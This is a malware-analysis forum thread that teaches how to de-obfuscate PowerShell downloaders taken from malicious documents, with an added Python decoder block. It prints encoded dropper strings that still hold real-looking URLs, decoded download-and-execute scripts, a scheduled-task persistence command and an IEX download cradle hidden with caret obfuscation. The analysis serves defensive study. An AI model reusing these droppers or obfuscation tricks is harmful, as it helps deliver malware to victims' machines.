How-to Guide: How to de-obfuscate PowerShell script commands (Examples).

Discussion in 'Tutorials & Guides' started by Andy Ful, Oct 20, 2017.

  1. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #1 Andy Ful, Oct 20, 2017
    Last edited: Oct 20, 2017
    I am going to present some examples of de-obfuscating PowerShell script commands embedded in malicious documents, using the results from hybrid-analysis.com.

    Please, use this method only in a virtual machine, even when you are an experienced user.

    Many malicious documents have obfuscated VBA macros that can run encoded and obfuscated script commands (3 code-hiding layers). Sometimes the obfuscated VBA functions are visible under the 'Extracted Strings' section in the sample analysis on the Free Automated Malware Analysis Service - powered by VxStream Sandbox website, so they can be de-obfuscated and decoded. But often this can be time-consuming. I noticed that in many cases the sample analysis shows the code that is run after de-obfuscating the macros and decoding the PowerShell commands (BASE64 decoding). That code can be seen under the 'Hybrid Analysis' section. But still, in some cases, it is obfuscated and unreadable. In this post, I present a simple method to de-obfuscate one popular code-hiding method.

    Let's start with the example from 'Malware Samples 18/10/17 #11'.

    0245262.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '0245262.doc'

    Open the above link and navigate to the 'Hybrid Analysis' section - you will see something like this:

    WINWORD.EXE /n "C:\378cad5cd01226de423b71f4081c18d2a0479b648a829d0e355f55d0863f2c79.doc" (PID: 1096)
    cmd.exe "cmd /V /C "set %qnWiiHuKf%=p^owe^rs&&set %KdQVMpNqo%=he^ll&&!%qnWiiHuKf%!!%KdQVMpNqo%! -e LgAoACA...AKQAgAA== (PID: 4056)
    powershell.exe powershell -e LgAoACA...AKQAgAA== (PID: 4092, Additional Context: IEX(-JoIn ('36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])})))
    62602.exe (PID: 3304) 14/63 Hash Seen Before
    62602.exe g (PID: 3312) 14/63 Hash Seen Before
    schtasks.exe /CREATE /TN "2SyJgHnV" /TR "%TEMP%\62602.exe" /SC ONLOGON /RL HIGHEST /F (PID: 3332)
    explorer.exe (PID: 3060) Hash Seen Before
    (...) Please refer to the XML/JSON reports to view the remaining child processes.
    DW20.EXE -x -s 1504 (PID: 3024) Hash Seen Before
    62602.exe (PID: 3276) 14/63

    The string LgAoACA...AKQAgAA== in the above text was shortened; the original string is many times longer and contains encoded (BASE64) malicious PowerShell commands. Here, IEX is the dangerous command that runs the code, so it must be skipped!!! You do not want to run the malicious PowerShell script.
    The last fragment: -JoIn ('36h119h115 ... forEach { ( [iNT] $_ -As [cHAR])})
    contains obfuscated PowerShell commands and the code that de-obfuscates them.

    So, the de-obfuscating instruction has the form:
    -Join ('obfuscated commands here'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])})
    The above instruction tells PowerShell that the numbers (in 'obfuscated commands here') should be converted to the appropriate UNICODE characters, and that the ':i{mShU!c%' characters are used to split the numbers, so they should be skipped when decoding. Next, all decoded characters (space character included) should be joined together.

    But, we can use this instruction, too!!!
    Let's go:

    Code:
    $EncodedString = '36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'
    $obfuscatingCharacters = ':i{mShU!c%'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    After copying the above code and pasting it into the PowerShell console (and pressing Enter), you will see the de-obfuscated commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaa.info/1'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    Rech-82559693785.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Rech-82559693785.doc'

    Code:
    $EncodedString = '36,119,115, 99 ,114 ,105 ,112 , 116 ,32 ,61 , 32, 110 , 101 , 119, 45,111,98 , 106 , 101,99,116 ,32 ,45 , 67,111 , 109 , 79,98 ,106 ,101,99, 116, 32,87 , 83,99,114 ,105,112 , 116 ,46, 83, 104 ,101 , 108 ,108,59 , 36 ,119 ,101 ,98,99 ,108,105 ,101, 110 ,116, 32,61, 32 , 110,101, 119 , 45 ,111 , 98, 106, 101 , 99,116 ,32 ,83 , 121 ,115 , 116 , 101, 109 , 46, 78 ,101,116,46 , 87 , 101 , 98 ,67, 108 , 105,101, 110, 116 ,59 , 36 ,114 ,97 , 110,100 ,111, 109, 32 ,61, 32,110 ,101 ,119 ,45, 111, 98,106 ,101,99, 116 , 32, 114 , 97,110,100, 111 ,109, 59 ,36,117 , 114 ,108 ,115 ,32 , 61 , 32,39 ,104 ,116 ,116 , 112 , 58, 47 , 47 , 108, 121 ,109 , 97,110 ,105 ,116 ,101 ,46 , 99 , 111, 109 ,47,82, 119 , 97 , 89,103,97,109,68 , 47,44,104 ,116 ,116 , 112 ,58 , 47, 47,104 ,97 , 108 ,97 , 114 ,105 ,115,46 , 99 ,111, 109 ,47,71 , 72 ,101,47 , 44,104 ,116, 116, 112 ,58 ,47 , 47 , 108, 111 , 118,101 ,110 , 100 ,117 , 115 ,107, 105 , 46 ,99, 111 ,109,47 , 119,69,115, 106,104,78 ,100 , 47,44 , 104 , 116, 116,112 ,58,47,47 ,97,112, 101, 114 ,102,101 , 99 ,116,105 , 109, 97 , 103 , 101 , 46,112 ,108, 47, 47 ,72 , 87 ,109 , 119 ,47, 44, 104, 116 , 116,112 , 58, 47, 47 , 108 ,117, 120, 109, 101 ,100 , 105 , 97 , 46, 99 ,111, 109,46 , 112, 108, 47 ,112 , 111 ,114 ,116,102, 111, 108, 105 ,111,47, 111 , 103,90, 47 , 39, 46, 83,112,108,105,116,40, 39,44, 39, 41, 59, 36, 110, 97, 109 , 101 ,32 ,61,32, 36, 114,97 ,110 , 100 , 111,109,46, 110,101 ,120 , 116 ,40 , 49,44, 32 ,54, 53 ,53 , 51 ,54, 41,59, 36,112,97 ,116, 104 , 32, 61 ,32 , 36,101, 110, 118 , 58,116,101 , 109 ,112 ,32,43 ,32, 39 ,92 , 39,32, 43 ,32 , 36 , 110 ,97, 109 ,101,32 ,43 ,32,39 ,46 , 101,120 , 101,39, 59 , 102,111,114,101, 97,99 ,104,40,36, 117 ,114, 108, 32, 105,110,32, 36 ,117, 114 , 108 , 115 , 41 , 123,116, 114, 121,123 , 36 ,119 , 101 ,98,99 ,108, 105 , 101 , 110 , 116 ,46, 68, 111, 119 ,110,108 ,111,97 ,100,70,105 , 108 ,101 , 40 ,36, 117, 114 , 108 , 46, 84 ,111 , 83 , 116, 114, 105,110, 103,40, 
41,44,32 ,36 ,112 , 97 , 116,104 , 41,59 ,83,116,97,114,116,45 , 80 , 114 , 111 , 99 , 101, 115 ,115 ,32 ,36 , 112,97, 116,104,59 ,98 , 114,101, 97, 107 , 59, 125, 99,97 , 116 , 99, 104, 123 , 119, 114 , 105 ,116 , 101,45 , 104 , 111 ,115, 116, 32 , 36 ,95,46 , 69 ,120, 99 , 101,112 ,116,105 ,111 ,110,46, 77, 101 , 115 , 115 , 97 ,103,101, 59, 125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://bbbbb.com/RwaYgamD/,http://ccccc.com/GHe/,http://ddddd.com/wEsjhNd/,http://eeeee.pl//HWmw/,http://fffff.com.pl/portfolio/ogZ/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name +'.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    index.html.17.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'index.html.17'

    Code:
    $EncodedString = '36d119&115;99&114K105&112K116d32;61d32&110}101K119!45K111z98!106n101;99G116&32d45&67G111z109Q79G98!106}101;99!116n32G87!83&99n114Q105K112&116;46;83G104K101Q108z108n59z36Q119d101&98G99&108z105!101;110K116;32n61}32}110d101d119}45d111K98!106z101z99d116G32&83K121K115;116!101n109Q46&78G101;116!46n87&101;98z67Q108}105d101&110&116;59;36&114K97G110n100n111n109&32z61n32}110d101K119!45z111;98!106;101G99Q116d32G114;97&110z100Q111z109G59Q36K117Q114d108}115K32n61;32K39n104}116;116;112z58!47K47;112!105;110}103d115K116K97d116}101d46G99!111}109&47d66z47Q44G104G116G116Q112Q58Q47z47K99!108Q97z110G99n111}109&115Q46}99n111z109Q47G118Q76Q103K75d116G119n109n65d76Q47;44K104&116}116n112}58z47d47d107G101K118G105K110}103n114K101z97G118;101K115G46n99z111d109z47z100&82!47;44}104d116Q116Q112&58z47;47z116z104z105d110;107G45d102&97d99}116z111d114!121}46K99&104!47;111!73;82}106z117}110n119&81&110!47Q44;104!116Q116Q112&58n47&47&109z111z98z105G108&105!122}114d46!99&111z109n47&117;71z102d68Q77}69n47&39}46;83Q112K108n105z116d40!39G44G39;41z59n36!110K97z109Q101G32!61z32!36n114n97&110z100&111}109}46z110n101K120!116d40n49Q44z32&54z53Q53d51;54;41&59}36Q112!97n116&104;32z61!32!36G101n110Q118Q58}116K101;109z112G32z43K32n39Q92!39Q32!43G32z36Q110G97K109n101d32}43n32}39K46&101G120G101d39d59n102d111Q114!101!97d99K104&40n36!117!114z108G32&105d110!32G36d117n114z108n115z41!123&116}114z121;123K36n119z101!98d99;108;105n101n110d116d46d68&111K119Q110Q108!111n97&100d70n105!108z101n40d36!117K114Q108K46!84z111z83n116G114&105&110n103G40K41Q44n32!36G112z97;116z104}41G59z83;116;97n114;116&45G80&114z111!99}101z115G115Q32;36Q112d97Q116}104!59z98Q114&101G97K107K59;125Q99Q97&116d99&104d123z119&114z105;116K101G45!104K111;115;116G32!36K95&46;69K120&99K101&112n116G105;111}110!46!77K101G115K115&97;103!101G59&125!125'
    $obfuscatingCharacters = '&!Kzd}nQ;G'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated script commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://ggggg.com/B/,http://hhhhh.com/vLgKtwmAL/,http://iiiii.com/dR/,http://jjjjj.ch/oIRjunwQn/,http://kkkkk.com/uGfDME/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    DHL number 53611761989PDW_YPZLF (29 Sep 17).pdf
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'DHL number 53611761989PDW_YPZLF (29 Sep 17).pdf'

    Code:
    $EncodedString = '36 ,119 , 115,99 ,114 ,105, 112 , 116, 32, 61 , 32,110 , 101 , 119,45 ,111 , 98, 106 ,101, 99 , 116,32,45 ,67 ,111, 109 ,79 ,98 , 106, 101, 99,116,32,87,83 , 99,114 , 105 , 112,116,46,83,104 ,101, 108 ,108 ,59, 36, 119,101,98,99 , 108,105,101 , 110 ,116 , 32, 61,32 , 110 ,101, 119,45,111, 98,106 ,101,99,116, 32,83 ,121, 115 , 116 , 101 ,109 ,46 ,78, 101 ,116,46 , 87,101,98, 67,108 , 105,101 ,110 ,116 ,59,36,114,97, 110 ,100 , 111,109,32 ,61, 32 , 110, 101 , 119,45 ,111,98 , 106, 101, 99,116 , 32, 114 ,97 , 110 ,100,111 ,109,59 , 36 ,117, 114, 108,115 , 32, 61 ,32 ,39, 104 ,116,116,112 ,58,47 , 47 ,112,117 ,109,112, 97,46,99 , 111,109, 46,97 , 117 ,47 , 113 , 103 ,73 , 47 ,44,104,116,116, 112 , 58 ,47 , 47,110, 111,118 ,97 , 112 ,108,97,122, 97,46,99 ,111, 109, 47, 109, 47 ,44,104 ,116, 116,112,58 , 47 , 47 ,119 , 105, 99 ,107 , 101, 100,115 , 107 ,105 ,110 , 122 ,46 ,110 , 101,116 ,47 , 73 ,106, 121 ,103 , 104 ,47, 44 , 104 ,116, 116,112 ,58 ,47 , 47 ,114 ,97,105 , 110, 98, 111 , 119, 116, 117 , 114 ,116, 108, 101 ,46 , 111 ,114, 103 , 46,117,107,47 , 79 , 99, 110,100 , 81, 66, 85 ,47, 44 , 104,116 ,116, 112 , 58 , 47, 47,114 ,97, 119 ,109,97,116, 101, 114 ,105 , 97, 108,115,117 ,112 , 112 ,108 , 105,101 ,114 , 115 , 46 , 99, 111,109, 47,77,66 , 78, 111 ,47, 39 ,46,83 , 112 , 108,105 ,116 ,40 , 39,44 ,39,41 ,59 , 36 ,110 ,97, 109,101 ,32, 61 , 32, 36, 114,97 , 110 , 100 , 111 , 109, 46 ,110,101, 120 ,116,40 , 49 , 44 ,32 , 54,53 , 53,51, 54 , 41, 59,36 ,112 , 97 , 116 ,104 , 32, 61,32, 36 , 101 , 110,118 ,58, 116 ,101 , 109 ,112 , 32,43 , 32 ,39 , 92,39,32,43 ,32, 36 ,110 , 97 ,109, 101 , 32 ,43,32, 39 , 46 , 101 ,120,101 , 39 ,59, 102 , 111 ,114 , 101, 97 ,99, 104 ,40,36 , 117,114 , 108,32,105,110, 32, 36 , 117 ,114,108 ,115, 41 , 123,116 ,114 , 121, 123, 36 ,119 , 101 , 98 ,99 ,108 , 105 , 101,110 , 116, 46 ,68 ,111 ,119 , 110, 108, 111,97 , 100,70,105, 108 ,101,40,36, 117,114, 108 , 46,84 , 111, 83,116, 114 , 105, 110 , 103 ,40,41 ,44,32 
,36, 112 ,97 , 116,104, 41 , 59,83,116 , 97 , 114,116 , 45,80 , 114 , 111,99, 101 ,115,115 ,32, 36 , 112 ,97,116, 104, 59 , 98, 114 , 101 ,97,107 , 59 , 125, 99 ,97 ,116,99, 104 ,123,119 , 114 , 105, 116, 101 , 45, 104, 111, 115 ,116 , 32, 36,95 , 46 ,69 , 120,99, 101 , 112 , 116, 105,111 ,110,46 ,77 , 101 , 115 ,115, 97, 103,101, 59 ,125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://lllll.com.au/qgI/,http://mmmmm.com/m/,http://nnnnn.net/Ijygh/,http://ooooo.org.uk/OcndQBU/,http://ppppp.com/MBNo/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name +'.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    Rechnung.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '2017-11-Oct-17'

    Code:
    $EncodedString = '36Q119w115F99F114F105}112M116M32Q61u32p110p101M119p45u111u98u106}101S99Z116Z32F45Q67p111Q109F79u98M106Q101S99Z116Z32w87}83G99Q114w105F112}116p46Q83}104}101w108S108G59}36}119F101w98}99G108Z105F101}110F116S32F61F32p110M101F119M45S111u98u106p101w99S116p32}83u121M115w116Z101w109G46M78Z101u116M46u87Z101Q98M67F108Q105S101F110G116F59F36p114Q97S110u100Z111Q109Z32w61w32S110S101G119w45w111}98}106G101Z99}116M32u114w97M110G100G111w109u59M36w117Z114Z108p115S32u61w32F39}104M116p116S112G58S47}47S97}109M105}114S97S98w101G100G105w110}46w99G111M109}47}73}114S113u79Z98G98F87w87Q69Z68Q47Z44Q104p116Q116M112G58u47}47Z97F108p108Q115Z116p97p116Z101Q116u101w110Q116F46S99F111F109M47u84F90p90S87F109Q74Z47F44Z104S116M116M112M58M47u47Q102p105S108F108G105F115u99u104w46S99Z111Z109}47p78Z122}87p77M104F113Q67p115p47w44Z104Q116M116}112Q58Z47w47}101G100p105p116Z105M111Q110w115Q116G114p97}106M101M116G46}99w111S109M47G78}87u99}117S105Z71}71}90F80S47F44M104w116S116S112M58S47M47u101p115p109Z101}105F106Z101Q114G46F101Z117p47}108M112p118S84S119Q118Z100}100p47u39Q46w83}112Z108}105M116S40p39w44F39M41M59Q36S110}97Z109p101M32M61M32Q36p114Q97}110Q100p111w109u46p110Z101F120w116w40M49w44Q32G54G53F53M51w54F41}59Z36G112w97Z116M104u32F61S32}36}101G110Z118u58u116p101}109p112p32u43Z32w39F92Q39}32F43S32u36u110}97p109}101F32M43F32w39G46F101p120Z101Q39w59S102Q111Q114S101F97}99F104G40Z36Q117F114p108S32F105Q110p32p36}117p114u108M115Z41}123Q116G114p121}123M36S119p101S98Q99M108F105S101u110M116G46Q68Z111Q119F110G108w111F97u100Z70w105G108M101Q40u36w117u114F108}46F84u111u83}116Z114}105F110F103S40S41Q44F32u36G112S97M116S104w41Z59Q83}116F97F114S116G45u80Q114S111Q99S101}115Q115F32}36Z112p97Q116u104}59G98p114Z101Z97S107}59u125M99}97M116F99}104u123Z119Q114Q105u116F101w45u104Z111Z115w116M32}36p95Q46w69Z120Q99}101Q112S116u105Q111Q110w46S77S101G115G115Q97S103F101F59Q125u125'
    $obfuscatingCharacters = 'upM}FwZSQG'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://qqqqq.com/IrqObbWWED/,http://rrrrr.com/TZZWmJ/,http://sssss.com/NzWMhqCs/,http://ttttt.com/NWcuiGGZP/,http://uuuuu.eu/lpvTwvdd/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    REMARKS
    The PowerShell instruction:
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    does not execute the de-obfuscated commands.
    All malware examples were taken from malware samples tested on Malware Hub (last four weeks).
    They are very similar. All of them try to use the 'new-object System.Net.WebClient' command to download the payloads from the malicious websites. This command is disabled when ConstrainedLanguage mode is set in PowerShell.

    Hope it will help someone.
     
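The same split-and-join decoding as an added Python example (not code from the post), so that nothing from a sample is ever handed to PowerShell: it pulls the numeric string and the separator set out of a captured 'Additional Context' line, maps the numbers to characters, handles both separator styles seen in this thread (a custom character set and comma-plus-spaces), and also decodes the Base64/UTF-16LE blob that follows -e. The numeric fragment is the start of the post's own string; the process line around it and the -e blob are constructed.

```python
import base64
import re

# Constructed sample: the numeric fragment is the start of the post's own string (it decodes
# to the first statement) with the post's separator set; the surrounding process line and the
# -e blob (Base64 of UTF-16LE "$x = 1") are made up for this example.
SAMPLE_BODY = ("36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32"
               "!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101"
               "{108%108:59")
SAMPLE_SEPARATORS = ":i{mShU!c%"
SAMPLE_PROCESS_LINE = (
    "powershell.exe powershell -e JAB4ACAAPQAgADEA (PID: 4092, Additional Context: "
    "IEX(-JoIn ('" + SAMPLE_BODY + "'.sPLIt('" + SAMPLE_SEPARATORS + "') | "
    "forEach { ( [iNT] $_ -As [cHAR])})))"
)

# -JoIn ('<numbers>'.sPLIt('<separators>') | forEach { ( [iNT] $_ -As [cHAR])})
JOIN_SPLIT_RE = re.compile(
    r"-join\s*\(\s*'(?P<body>[^']*)'\s*\.split\s*\(\s*'(?P<seps>[^']*)'\s*\)",
    re.IGNORECASE,
)
# powershell -e / -enc / -EncodedCommand <Base64>; heuristic: the blob must be at least 8 chars
ENCODED_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_split_join(body, separators):
    """Same result as -Join (body.Split(separators) | % { [int]$_ -as [char] }), never run
    through PowerShell: each separator character becomes a space, then every remaining
    integer token is turned into its Unicode character.  Works for the thread's custom
    separator sets and for the comma-plus-spaces variant alike."""
    table = {ord(c): " " for c in separators}
    return "".join(chr(int(token)) for token in body.translate(table).split())


def decode_from_process_line(line):
    """Pull body and separator set out of a captured 'Additional Context' line and decode."""
    m = JOIN_SPLIT_RE.search(line)
    return decode_split_join(m.group("body"), m.group("seps")) if m else None


def decode_encoded_command(line):
    """Decode the -e argument: Base64 of the UTF-16LE script text."""
    m = ENCODED_RE.search(line)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_PROCESS_LINE))    # $x = 1
    print(decode_from_process_line(SAMPLE_PROCESS_LINE))  # $wscript = new-object -ComObject WScript.Shell;
```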
  2. Andy Ful

    Example from Malware Samples 23/10/17 #10
    Transaction Details - 030PAF.doc (2017.doc on hybrid-analysis)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '2017'
    Code:
    $EncodedString = '36 ,119 ,115, 99 , 114 ,105,112 ,116 , 32 , 61 , 32,110,101 ,119,45,111, 98 ,106 ,101 , 99 , 116 ,32 ,45 , 67, 111 , 109 , 79 ,98, 106,101 ,99, 116,32, 87 , 83,99,114 , 105 ,112 ,116, 46 , 83, 104, 101,108 , 108 ,59, 36,119,101 , 98 , 99,108 , 105, 101,110,116 , 32,61 ,32 ,110 ,101 , 119, 45 ,111 ,98 , 106 ,101 , 99 ,116, 32,83, 121,115 , 116 , 101,109 ,46 ,78, 101, 116 ,46 ,87,101, 98,67 ,108, 105, 101,110, 116 , 59 , 36 , 114,97,110 ,100 ,111,109 , 32 ,61, 32 , 110,101, 119, 45 ,111 , 98 , 106, 101 , 99,116,32 ,114 , 97 ,110, 100, 111,109 ,59 ,36, 117, 114 , 108 ,115,32,61 , 32 , 39 , 104,116,116, 112 ,58, 47 , 47, 98,114,111, 101 ,114, 97 , 114 ,116,46,100,101,47,99, 119, 78 ,90,47 ,44 , 104,116 , 116,112 , 58 , 47 , 47,103, 104, 101,105 , 110,101 , 109 , 97,110,110 , 46 , 100,101 ,47 ,112 ,113 , 74,110,106,47 ,44,104,116 ,116 , 112 , 58,47 ,47,114 , 97,115, 115 ,109, 117,115 ,101 ,110 ,46, 99 ,122 , 47,115 ,110 ,82 , 97 ,47, 44 , 104,116 ,116, 112,58, 47, 47 ,111 ,122,45 ,108 ,105,110 ,107 , 46, 99 ,111,109, 47, 113,120, 115 , 83 ,112 , 81 , 74,84,47 , 44 , 104,116,116,112, 58 ,47,47, 98,108 ,117,101,116, 111,110,103 , 117, 101 ,99, 97,109 ,112 ,101,114, 115,46 , 99,111 , 109 ,46, 97 , 117 , 47 ,106,81,76, 112, 73 ,108 , 98, 111 , 114,47 ,39, 46,83 ,112 ,108, 105 , 116 ,40 ,39 ,44 , 39 , 41 ,59, 36 , 110 ,97 ,109, 101 ,32 , 61,32, 36, 114 , 97 , 110,100 , 111 ,109,46 , 110 ,101,120,116, 40 , 49 ,44, 32,54,53, 53 , 51 ,54 ,41 ,59, 36 , 112 , 97,116,104,32, 61 , 32 , 36,101, 110,118 , 58,116,101 ,109 , 112, 32,43,32,39,92 , 39, 32 , 43,32 ,36,110,97, 109, 101 , 32, 43 , 32,39 , 46, 101,120 ,101,39, 59, 102, 111 ,114 ,101 ,97 , 99, 104 ,40, 36 , 117 ,114 , 108, 32 , 105, 110, 32,36,117 , 114,108 , 115 , 41 , 123, 116 , 114 ,121, 123 , 36 ,119, 101 ,98 , 99, 108 ,105,101,110 ,116, 46 ,68,111, 119 , 110,108 ,111, 97 , 100,70 , 105, 108, 101, 40, 36 , 117, 114,108, 46,84 ,111, 83 , 116, 114 , 105, 110 ,103 ,40 , 41, 44, 32 , 36, 112, 97 , 
116,104, 41,59, 83 , 116 ,97,114, 116 , 45 , 80 , 114 , 111 ,99 , 101 ,115 , 115 ,32, 36, 112 ,97,116 , 104,59,98,114, 101 ,97 , 107 ,59 , 125,99, 97 ,116 ,99, 104, 123, 119 ,114 ,105,116 ,101 , 45 ,104, 111, 115, 116, 32,36, 95 ,46 ,69 ,120,99 , 101 , 112, 116 ,105,111 , 110,46 ,77, 101, 115, 115, 97, 103,101,59, 125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    De-obfuscated script:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaa/cwNZ/,http://bbbb/pqJnj/,http://cccc/snRa/,http://dddd/qxsSpQJT/,http://eeee/jQLpIlbor/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    Nothing new. :)
     
  3. Andy Ful

    Example from Malware Samples 26-10-17 #9
    _3510084137412321755854810010016.lnk
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '3510084137412355854810010016.rar'

    This is a very simple example of script obfuscation, and its role is obvious even without de-obfuscation. Anyway, it is a good example of popular obfuscation tricks:
    Code:
    cmd.exe /V /C "set ox=e^n&&set tq=^ers&&set oc=h^e^l^l&&set ar=^p^ow&&set ne=^W^i^nd^ows!ar!!tq!!oc!\v1.^0\!ar!!tq!!oc!.e^xe&&echo ^Iyo;
    ^iE^x^(^N^E^w^-O^bjE^CT^ ^Net.^WE^b^c^liEn^T).^Dow^N^l^oA^d^s^TRi^N^G('htt^p^s^:/^/a^aa^a^.aa^aaa^a^aa.co^m^/v^2/^gl.p^h^p^?^a^H^R0c^H^M^6Ly^9^mc^mV^lLm9w^a^G^F^t^cGV5^L^mN^v^b^S^9^2Mn^x^nd^k^R^R'^);^Z^Fe | !ne! -^no^p^ ^-"

    First, we have to delete all occurrences of the ^ character:
    Code:
    cmd.exe /V /C "set ox=en&&set tq=ers&&set oc=hell&&set ar=pow&&set ne=Windows!ar!!tq!!oc!\v1.0\!ar!!tq!!oc!.exe&&echo Iyo;
    iEx(NEw-ObjECT Net.WEbcliEnT).DowNloAdsTRiNG('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR');ZFe | !ne! -nop -"

    The script is more readable, but now it uses the ! character to split variables: ar, tq, oc. So, we should replace the variables with their values (ar=pow, tq=ers, oc=hell --> powershell):
